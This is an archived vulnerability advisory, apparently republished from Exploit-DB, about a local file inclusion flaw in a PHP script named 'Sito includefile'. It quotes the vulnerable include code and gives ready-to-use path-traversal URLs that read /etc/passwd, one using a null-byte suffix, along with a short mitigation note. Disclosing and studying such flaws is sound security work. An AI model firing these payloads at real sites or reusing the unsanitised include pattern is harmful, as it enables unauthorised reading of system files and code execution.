Sito includefile in PHP Local File Inclusion Vulnerabilities

vendor:

N/A

by:

StAkeR

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Sito includefile in PHP Local File Inclusion Vulnerabilities

The vulnerability exists due to insufficient sanitization of user-supplied input to the 'page' and 'page_file' parameters in 'includefile.php' script. A remote attacker can include arbitrary local files and execute arbitrary PHP code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the inclusion of arbitrary files. The application should also be configured to use the most restrictive file permissions possible.

Source

Exploit-DB raw data:

# ------------------------------------------------------------
# Sito includefile in PHP Local File Inclusion Vulnerabilities
# ------------------------------------------------------------
# Discovered By StAkeR[at]hotmail[dot]it
# Download On http://www.niclor.net/prodotti/include_Sito_PHP/include_Sito_PHP.zip
# -----------------------------------------------------------

# File (includefile.php)
# Register Globals On
1. <? 
2. if (($page != "") or ($page == "home")) {
3.    include "pagine/$page_file";
4. } else {
5.    include "pagine/home.php";
6. }
7. ?>

# includefile.php?page=athos&page_file=../../../../../../etc/passwd

# File (index.php)
# Magic_Quotes_GPC
# index.php?id=../../../../../etc/passwd%00 

# milw0rm.com [2008-11-04]